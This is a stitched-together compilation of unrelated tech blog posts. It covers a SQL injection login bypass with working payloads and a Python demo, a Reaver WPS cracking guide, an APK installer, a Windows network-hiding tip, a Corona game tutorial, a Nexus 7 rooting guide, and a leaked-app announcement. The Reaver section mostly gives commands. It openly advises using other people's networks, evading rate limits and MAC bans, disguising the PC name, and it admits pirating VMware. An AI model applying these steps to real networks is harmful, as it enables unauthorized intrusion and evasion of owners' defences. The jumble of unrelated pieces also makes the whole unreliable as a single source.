What is SQL Injection?

Acunetix describes it as "the type of attack that takes advantage of improper coding of your web applications that allows a hacker to inject SQL commands into, say, a login form to allow them to gain access to the data held within your database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly." In this article we are going to see a login bypass using SQL Injection.
To make it more interesting, I am going to divide this article into two parts: first the web programmer's part and then the hacker's part. I am going to use WampServer for this. Imagine a web programmer has been hired to code a website for a newly formed company named shunya. He codes the website as below. The first file is index.php. On this page he creates three buttons and adds functionality to the 'Login' button.
Image
Image
So when a user clicks on the Login button, he is redirected to another page called action.php, which is the login form for the users of shunya.com.
Image
Its script is given below.
Image
In the above code notice that the form action is set to process.php. This file validates the users: when a user submits a username and password, it connects to the database and runs a query to check whether a matching user exists. If the user is in the database and the password matches, he is taken to login_success.php.
Image
The above script is very important to understand SQL Injection. You can see that the username and password are submitted as raw input. Notice also the query underlined.
This is the database the programmer has created  for the website. 
Image
When a user in the database enters the correct password as shown below, he is redirected to the login_success page.
Image
The page below is the page I set for login_success.php.
Image
When a user who is not in the database, or a valid user who leaves the password blank, tries to log in like below,
Image
this happens.
Image
That’s the end of the programmer part. Now it’s time for the hacker part. A hacker happens to find the site of shunya.com. In the Login form, he inserts a single quote to see if the site is vulnerable to SQL Injection.
Image
He gets the error message below. This indicates that the quote reached the database unescaped, so the site is vulnerable to SQL Injection.
Image
Then he tries a query like the one shown below.
Image

Surprisingly, he gets access to the restricted area. How does this work? process.php pastes the submitted text straight into the query string, so the statement $sql is no longer

$sql = "SELECT * FROM $tbl_name WHERE username='...' ...";

with the attacker's text safely inside the quotes; instead the first quote the attacker typed closes the username literal and everything after it is read as SQL. The result is still a syntactically valid query, and the user is logged in without the password ever being checked against the database. Several inputs work the same way. Two of them are:

' or '1'='1
' or '1'='1'

With the first one in the username field, the WHERE clause becomes

username='' or '1'='1'

which asks for rows where the username is empty OR one equals one. One is always equal to one, so the condition holds for every row and the first user in the table is returned. One caveat for trial and error: if the query goes on with "and password='...'", AND binds tighter than OR, so either the same text has to go into the password field as well or the rest of the statement has to be commented out. Many more variants can be found by experimenting. The root cause is that user input is concatenated directly into the SQL text. Our web programmer finds out about the vulnerability after a short time and patches it as below.
Image

mysql_real_escape_string does not remove special characters; it escapes them, putting a backslash in front of characters such as the single quote, the backslash and NUL, so that MySQL treats the attacker's quote as part of the string value rather than as the end of the literal. Now try the same inputs and see what happens. Two caveats are worth knowing: escaping only protects values placed inside quotes (an unquoted numeric parameter still needs casting or validation), and the mysql_* functions are deprecated and were removed in PHP 7, so the lasting fix is a prepared statement with bound parameters (PDO or mysqli), which keeps the SQL text and the data separate. Thank you.
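To see both halves of the story in running code, here is an added example written for this page in Python against SQLite; it is not the tutorial's PHP, and the table name members with its two columns is an assumption, since the page shows its schema only in screenshots. It builds the login check the way process.php does, by pasting the submitted text into the query, and beside it the same check as a parameterised query. With the bypass string from above placed in both fields the vulnerable version logs in without a valid password; placed in the username field alone it does not, because AND binds tighter than OR, which is the kind of thing trial and error turns up. The single-quote probe from the hacker part is included as well.

```python
import sqlite3

# Added example, not the tutorial's PHP: the same login check written against an
# in-memory SQLite database so it runs offline. The table name and columns are
# assumptions (the page shows its schema only in screenshots); the rows are
# constructed sample data.
USERS = [("admin", "s3cret"), ("alice", "wonderland")]

PAYLOAD = "' or '1'='1"   # the bypass string from the article, quotes straightened


def make_db():
    """Stand-in for the tutorial's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Mirrors process.php: the submitted text is pasted straight into the query.

    A quote in the input ends the string literal early and everything after it
    is parsed as SQL, so the attacker rewrites the WHERE clause.
    """
    sql = "SELECT * FROM members WHERE username='%s' AND password='%s'" % (
        username, password)
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """The durable fix: a parameterised query. The SQL text is fixed and the
    driver hands the values to the engine separately, so a quote in the input
    is just a character inside a value."""
    sql = "SELECT * FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def quote_probe(conn):
    """The hacker's first test: a lone single quote in the username field.
    A database error means the quote reached the SQL parser, i.e. the input is
    not being escaped or parameterised."""
    try:
        vulnerable_login(conn, "'", "")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    print("single-quote probe raises an error:", quote_probe(conn))
    print("payload in both fields, vulnerable   :", vulnerable_login(conn, PAYLOAD, PAYLOAD))
    print("payload in username only, vulnerable :", vulnerable_login(conn, PAYLOAD, ""))
    print("payload in both fields, parameterised:", safe_login(conn, PAYLOAD, PAYLOAD))
```

Run it as a script and compare the four lines: the probe errors, the payload in both fields logs in, the payload in the username alone fails on the AND, and the parameterised query is not fooled. The same experiment against the PHP page, with the payload typed into the form, should give matching results.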

WPA2 Wi-Fi Password hacking guide (BT5/Kali linux)

This guide is for penetration testing your own network, or someone else's with permission.
Using someone else's Wi-Fi is theft of service and may or may not be a criminal offence in your area.
Neither Logan nor anyone from Tek Syndicate is liable for your actions; you are, so proceed with caution!
EDIT: Kali Linux is now out, as Logan said on The Tek a few weeks back. Kali is built from the same tools by the same team, so this guide works with both BT5 R3 and Kali.

1st step: you will need a copy of BackTrack 5, so go here http://www.backtrack-linux.org/downloads/
or Kali Linux from here (the guide is the same for both) http://www.kali.org/downloads/
and get yourself an ISO (32- or 64-bit depending on your hardware).
Either burn it to disc using ImgBurn http://www.imgburn.com/index.php?act=download
or make a live USB of 4 GB or more; then you can save sessions and not have to start over when you power off. That's a good idea, as I have had attacks take up to a day and a half (because of weak signal), and with a disc, once powered down......
To do this I use http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ (it'll do Windows too).
Or, as a third option, you could run it as a virtual machine with VMware from within Windows, but if you do that you HAVE to use a USB Wi-Fi dongle, because the internal Wi-Fi card of a laptop gets seen as Ethernet by the guest OS. I don't know why, but I have found it to be true. VMware is not freeware; there may be a trial or crippleware version available at http://www.vmware.com/uk/ but I sailed away from The Pirate Bay with my copy. I won't link directly to it as I may get in trouble from Logan, but you're a smart guy, you can find it ;)
OK, so now you have a disc/USB or virtual machine. Power on, go into the BIOS (Del, F11, F2 or another key depending on hardware) and set it to boot from disc or USB (not applicable to a VM), and let's have some fun!
When the first menu comes up you want default text mode.
When the cursor becomes available type "startx" without the quotes and it will boot into a desktop.
Go to the top of the screen and click on the little black screen to open a terminal (looks like a Windows cmd window).
Now to find out what Wi-Fi adapter you have,
type "airmon-ng" (no quotes).
If it doesn't list anything then your Wi-Fi adapter is not usable with BT5: either its driver cannot put it into monitor mode (which is what this needs, rather than promiscuous mode) or there is no driver support at all. Most laptop internal Wi-Fi I have found to work, and most full-size USB dongles do too; the TP-Link TL-WN821N works for definite.
The output from that is normally wlan0, but if you have multiple adapters you will get more options.
Type "airmon-ng start wlan0",
assuming wlan0 was the output from the previous command; if not, put whatever the output was for the adapter you would like to use. It will output "monitor mode enabled on mon0" most times, unless you have multiple adapters.
So now we have set our adapter to monitor the airwaves, we can have a snoop at the available networks.
Type "wash -i mon0"
and it will list the access points in range that have WPS enabled, with signal strength, WPS version, whether WPS is locked, BSSIDs and other things. The attack below goes through WPS, not through the WPA2 handshake itself, so a network only shows up here (and is only attackable this way) if WPS is on and not locked, whatever its WPA/WPA2 setting. WEP is also doable and much quicker, but as a security standard it is dead and not in common use any more; if you would like a guide for that too, let me know in the thread and when I have a moment.....
Anyway, choose your victim's BSSID and
type "reaver -i mon0 -b BSSIDGOESHERE -vv"
and it will start working through the possible WPS PINs. It does not have to try all 100,000,000 eight-digit PINs: the access point confirms the first four digits and the last four separately, and the last digit is a checksum, so at most about 11,000 attempts are needed. It may be that you get a warning that AP rate limiting was detected: this is where a router recognises that it is being hit with wrong PINs and refuses WPS for a set amount of time. To combat this you need to add a delay with the -d option to the reaver command line, so it looks something like this:
"reaver -i mon0 -b BSSIDGOESHERE -d 20 -vv"
If AP rate limiting is still detected, keep increasing the delay by 5 seconds until you stop tripping the rate limit.
By using the -vv option you get more verbose output from the terminal, which lets you see if it is channel hopping or rate limited or whatever, and it also lets you see when it gets stuck in a loop on a particular PIN. When this happens I press Ctrl+C to stop the session, then up cursor for the last command and Enter, and it picks up where it left off (Reaver keeps its progress in a session file) and normally carries on without stuttering on the same PIN again.
After time passes it will output the password and the PIN. Copy both down: if the password is changed you can run the reaver command line again with -p PINHERE and it will recover the new password in less than a minute, as the PIN does not change. This would look like
"reaver -i mon0 -b BSSIDGOESHERE -p PINHERE -vv"
The password will get changed if you're found on a network you are not supposed to be on, which is why I put that command there, as I have had it happen a few times.
If this goes on and the network admin is savvy, they may stop changing the password and start banning MAC addresses from connecting to the router, but don't fear!
I use this http://www.technitium.com/ to change my MAC address, as I have had to deal with this problem before.
As a side note, if you are going to jump on a network that isn't yours, change your PC name to something not identifiable to you. Mine is called vm.lineupdate32, as the target network is on Virgin Media....see?
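Why does Reaver finish in hours or days rather than years? As an added example written for this page (not from the original post and not Reaver's own code), here is the PIN arithmetic in Python: the WPS checksum rule for the eighth digit, and a toy registrar that answers the way an access point does, rejecting after message M4 when the first four digits are wrong and after M6 when the last four are wrong. Brute-forcing against it shows that the two halves fall independently, so the worst case is 10,000 + 1,000 = 11,000 attempts instead of 100,000,000. The secret PINs are constructed sample values, and the toy access point deliberately ignores rate limiting and lockouts, which is what the -d delay above is for.

```python
# Added example, not from the original post or from Reaver itself: the WPS PIN
# arithmetic that keeps the brute force small. Sample PINs are constructed.


def wps_pin_checksum(first7):
    """Checksum digit for a 7-digit PIN body (the rule from the WPS specification)."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin8):
    """True when an 8-digit PIN's last digit is the checksum of the first seven."""
    s = str(pin8).zfill(8)
    return len(s) == 8 and s.isdigit() and int(s[7]) == wps_pin_checksum(int(s[:7]))


def candidate_pins(first_half):
    """All PINs that start with a confirmed first half: 1,000 second halves, each with
    its checksum digit forced, so only 3 digits of the last 4 are really unknown."""
    for second in range(1000):
        body = first_half * 1000 + second          # 7 digits
        yield body * 10 + wps_pin_checksum(body)   # 8 digits


def worst_case_attempts():
    """10^4 guesses for the first half plus 10^3 for the second half."""
    return 10_000 + 1_000


def make_registrar(secret_pin):
    """Toy access point (hypothetical, for the demo). A real AP NACKs after message M4
    when the first half is wrong and after M6 when the second half is wrong, which is
    what lets an attacker confirm each half separately. Lockouts and rate limiting,
    which the -d delay above works around, are deliberately not modelled."""
    secret = str(secret_pin).zfill(8)

    def respond(guess_pin):
        guess = str(guess_pin).zfill(8)
        if guess[:4] != secret[:4]:
            return "NACK after M4"
        if guess[4:] != secret[4:]:
            return "NACK after M6"
        return "M7 (credentials)"

    return respond


def brute_force(respond):
    """Reaver-style search against the toy registrar. Returns (pin, attempts)."""
    attempts = 0
    for first in range(10_000):
        attempts += 1
        # Only the first half is judged at M4, so the second half is a dummy here.
        if respond(first * 10_000) != "NACK after M4":
            break
    else:
        return None, attempts
    for pin in candidate_pins(first):
        attempts += 1
        if respond(pin) == "M7 (credentials)":
            return pin, attempts
    return None, attempts


if __name__ == "__main__":
    pin, tries = brute_force(make_registrar(12345670))   # constructed sample PIN
    print("recovered PIN %08d in %d attempts (worst case %d)"
          % (pin, tries, worst_case_attempts()))
```

The split search is also why the -p option works so quickly after a password change: once the PIN is known, a single exchange is enough to be handed the new credentials.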

APK Batch Installer (Install & Backup, SD, Wireless, Data) - v1.3.0d

It was a lot of pain getting the applications I had previously installed back in, even though I had backed up their APKs beforehand using tools like AppMonster. Batch installing was a bit difficult, with errors sometimes cropping up and some apps not working on ICS, and so that pretty much drove me to write... this.

-= APK Batch Installer =-

A simple little Windows app that is packaged with adb.exe. If you're so nice as to give it the directory in which all your APK files are stored (I keep local backups of mine on my PC), it'll scan that directory for APK files.


From there, it's just checking and ticking the apps you want to install and clicking next


And if things go right, it should automatically take you through the installation.

---- *ROOT* Batch Backup APks ----

As of v1.02 there is a backup function 

Simply click on the 'Batch Backup APKs' radio button, and fill in your options in the entry fields

And wait for the application to run through your device, backing up their APKs into a local directory.



It scans if you have applications installed to your SD Card as well...

And it is so kind as to rename your APKs based on their app names too.

---- Installs to SD Storage ----

As of v1.1.1, the Install to SD function has been revamped, such that after you tick 'Install to SD' and choose which apps to install...

An additional dialogue box will pop up, allowing you to choose which of the chosen APKs are installed to SD.

From there, the installer will update you on the progress of installations, and tell you which applications are being installed to SD.


---- *ROOT* Wireless ADB Connections ----

As of v1.2.0, as per suggestion by thewarhawk, and after an extensive amount of testing, APK Batch Install Tool now has support for Wireless ADB Transfers! 

Simply tick on it on the main page, and get ready your IP Details from your favourite Wireless ADB software 

After that, fill in the details and click "Establish Link" :3

Of course, if you throw it rubbish links, it'll hate you for it, and give you a sad android face.


With a proper link though, one that points to an actual device already set up, a happy face! 

After that, it's all smooth sailing as the application sends or backs up your APKs 


---- *ROOT* App Data Backup & Restore ----

After a LOT OF BLOOD, SWEAT, TEARS, and nearly going crazy with all of this, I finally present to you peeps... as of v1.3.0, the ability to back up and restore app data. NOTE that the data is stored in a format that is not compatible with Titanium or any of those other applications. The backup and restore are currently in their simplest form, in that you have to back up data in order to restore it. At the moment, based on the way APKs work and how I can pull information off them, you have to back up all installed apps on your device before you can individually select which ones to pull data from.

Once that is done, when installing APKs back onto your device with Data Restore flagged, the program will look in the chosen path for a subfolder called Data that contains all the data for the apps in 7z format. From there, you can select which to restore to your device.

But enough Chit Chat.


If 'Backup Data' is flagged, then at the end of the backing up process, you will be presented with a screen to select which of the following backed up apps to back data for...

From there...

It's watching and waiting as the installer does its work.

On to Restoration! Should the 'Restore Data' option be checked whilst in install mode... then

After selecting which APKs to install (and which to install to SD), you will be presented with this fine screen that asks you to choose which apps to restore data for (only apps with data are shown)

From there...

At the end of the installation process, the data of the selected apps will be restored onto the device 

---- Batch APK Renamer ----
v1.3.0a brings a small addition to the family, a bulk APK renamer, essentially a subdivision of what the backup function did 


Simply Point to directory with Messy APKs...

and....


Let It do the rest  

How To Hide Your Computer From Windows Network Neighborhood


If you share Windows folders, you have probably noticed that when you browse Network Neighborhood ("My Network Places" in XP or "Network" in Vista), Windows announces your PC name to anyone browsing on the same subnet.

While this is no big deal, you may want to hide your computer from being discovered but still be able to connect to its shared folders.
To hide your computer from the Network Neighborhood browse list, open a command prompt by clicking on Start \ Run… and typing the following:
net config server /HIDDEN:YES
If the command was executed successfully, you should see "The command completed successfully." or you can verify with the following command :
net config server
and check that the  "Server hidden" status is Yes:
Server Name                           \\WTN1
Server Comment                       
Software version                      Windows 2002
Server is active on                  
    NetbiosSmb (000000000000)
    NetBT_Tcpip_{F08BC22F-B129-43DF-886A-850FA5A9EF7F} (000c29f61483)
Server hidden                         Yes
Maximum Logged On Users               10
Maximum open files per session        16384
Idle session time (min)               15
The command completed successfully.

 
Now reboot your computer (the setting takes effect once the Server service has restarted). When Windows is back up, the machine will no longer appear when browsing the network. When you want to connect to a shared folder, you can map the drive using the following syntax from Windows Explorer (Tools \ Map Network Drive…):
\\computername\sharename
So if I wanted to connect to the shared folder called media on my computer named wtn1, I would map it as:
\\wtn1\media
If you want to unhide your computer, type the following at a command prompt and reboot:
net config server /HIDDEN:NO
The switch simply sets the Hidden value (REG_DWORD, 1 = hidden) under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, which is also where you can check it across a batch of machines. Remember, hiding your computer from the browse list is by no means secure and is no substitute for security: the shares are still reachable by anyone who knows or guesses the computer name, and tools that enumerate hosts directly rather than through the browse list will still find them. You should always secure your shares with proper permissions.

How to Build a game for iOS and Android with Corona



So, you decided to make your first game for iOS or Android and you will use Corona? Great choice, let’s see what you need to know to get the things started. We will divide this article in 3 sections; setting up, getting started and final touches.
These steps will be more than enough to figure out the basics of game development on Corona. Don’t forget, some of the most popular games for Smartphones (such as Blast Monkeys and Bubble Ball) were developed using Corona SDK.

Setting up the whole thing

Developing another iTunes hit is not that hard, but the first thing you have to do is download the Corona SDK from the official site. They offer an unlimited free trial version, where you can play as much as you want until you decide to publish the app; only at that moment do you need to subscribe. So, sign up for your free membership and start creating eBooks, games and much more. Corona is one of a kind and you must (at least) try this software.
I was totally clueless about programming and app development but I decided to sign up and give it a try. I will try to go with the eBook and if this goes well- Gaming world here I come!

Getting Started

Corona is great for those physics games where you have to figure out how to jump, push, slice or move in order to reach the goal. You know those 2D popular games; there are thousands of those in the app stores.
The first thing you need is a simple text editor such as Notepad; everybody has this, right? Next you should write some basic code, so you can see what is going to happen. If you don't have a clue about it, search a bit on YouTube or download the sample code from the Corona website; there are tons of examples there, free of charge.
A Corona application is built around main.lua, which is the starting point of the application. Beside this basic file you will see two more: build.settings and config.lua.
build.settings holds build-time settings such as the supported orientations and platform-specific options, while config.lua holds runtime settings such as the size of the content area and how it is scaled to different screens. So write each of these in Notepad, save them next to main.lua, and the Corona Simulator picks them up when it runs the project.
Now there is much more to game building on Corona but this is pretty much the very basic that you need to get started. Now, one article can’t teach you how to make the next big hit for iPhone but we can tell you some basic things that you can use over and over again.
Some basic codes to help you out
For example, if you need to create a physics game (these games are so popular) you need just one little line of code: local physics = require("physics"); and voilà! You have the physics engine loaded.
If you want to make a comment while working on the game you can always insert it in the code, so you know what the code stands for. Just type two dashes and the comment before your code, and that's it. Example: -- Generate Physics Engine
If you want to create a text that will be displayed for the player (for example, when he/she is waiting the page to load) write this line of code:

-- Create a new text field using native device font
local screenText = display.newText("...Loading Screen...", 0, 0, native.systemFont, 16*2)
screenText.xScale = 0.6
screenText.yScale = 0.6

Instead of a conclusion

If you want to learn more please visit Corona website because this is the best place to learn everything you need about game development using Corona. They even have Corona for dummies kind of books.
Author Bio: The article is written by Jason Phillips. He is a professional writer as well as a senior editor at some gaming sites.

How to Root Nexus 7 On Android 4.1 Jelly Bean, Unlock Bootloader, And Flash ClockworkMod Recovery


Amazingly, developers have devised a way to root the Nexus 7 before it has even been released. You can not only root your Nexus 7 but also unlock the bootloader and flash ClockworkMod Recovery.
Here is a step-by-step guide to rooting the Nexus 7, which will additionally take you through unlocking the bootloader and flashing ClockworkMod Recovery. The whole process is simple; just follow the guide as it is.
But before we proceed any further you must know that this process will void your device warranty, and that unlocking the bootloader wipes all user data from the tablet, so back up first. If any damage occurs, it is at your own risk.
The whole process is split into three parts: unlocking the bootloader, making ClockworkMod Recovery permanent, and finally gaining root access.

How to Unlock Bootloader

  1. Install the Android SDK on your PC (adb and fastboot live in its platform-tools folder).
  2. On the tablet, enter Settings > Developer options and enable USB debugging.
  3. Connect the Nexus 7 to the PC with a USB cable and reboot it into the bootloader with 'adb reboot bootloader' (fastboot commands only work while the device is in bootloader mode).
  4. Open a terminal or command prompt, navigate to the folder where fastboot is installed and run 'fastboot oem unlock'. Confirm on the tablet's screen; this is the step that wipes user data. When it is complete, enter 'fastboot reboot'.
  5. Download the recovery image and place it in the fastboot folder. With the tablet back in the bootloader (after the wipe, re-enable USB debugging and run 'adb reboot bootloader' again), enter 'fastboot flash recovery CWM-grouper-recovery.img'.
  6. Reboot by entering 'fastboot reboot'.

How to make ClockworkMod Recovery Permanent

Boot into ClockworkMod Recovery, mount /system from its mounts menu, then enter the following commands in a terminal on the PC in the stated sequence:
  1. 'adb shell'
  2. 'cd /system'
  3. 'mv recovery-from-boot.p recovery-from-boot.bak'
Renaming that file stops the stock ROM from restoring the factory recovery on the next boot, which is what would otherwise overwrite ClockworkMod.

How to gain Root Access

  1. Download the 'JB-SuperSU.zip' file and place it on your device's sdcard.
  2. Switch off your device and enter ClockworkMod Recovery (press Volume Up + Volume Down + Power).
  3. Choose to install a zip from the sdcard and select the JB-SuperSU.zip you placed there.
  4. Reboot your device.
If you have followed all the steps successfully, you are done and can install your favourite root-only apps.

Ice Cream Sandwich Android 4.0 (ICS) app leaked :Google+ 2.0 and Google Music


Android users will be delighted by the news that the latest version of Android, Ice Cream Sandwich, now has Google+ as a built-in app. The news came in today after the leaked news about Google Music. All smartphones running Android 4.0 Ice Cream Sandwich will have the new Google+ app.
Images credited to Android Police.

No official announcement has been made by Google. The news came from Android Police, a blog dedicated to Google's operating system; if you want to know the latest happenings around Android, you should follow Android Police regularly.
The owner of the blog claimed to have a Verizon device running Android 4.0 Ice Cream Sandwich, and the screenshots were also provided by the founder of the blog. The screenshots are impressive: the interface and layout of the app are polished and it appears to run smoothly on devices with Android 4.0.
This is not the only version of Android that supports the app; earlier versions are compatible too. The G+ app runs equally well on smartphones running Gingerbread and on tablets running Honeycomb. The blog's claim holds up: if you try the app on any device, this is the best Google+ app so far.
The blog noted: "As you can see, the update doesn't bring much in way of function, but it does bring a nice aesthetic update. There is one key thing missing, however: the widget. That's right — for some reason, the widget is nowhere to be found… but only on phones. This is most likely still a test build, so I would expect the widget to pop back up in the future. It is still available on tablets, and it's a major upgrade from the current widget."
Check your settings before you install it: unless "Unknown sources" is enabled under Settings > Applications, you will not be able to install an APK from outside the Market.
The app is now available to download and is easy to install. Have it downloaded and get your hands on it. If you happen to be a regular user of Google+ from your smartphone, this one is for you; go grab it, and write us your reviews as well.
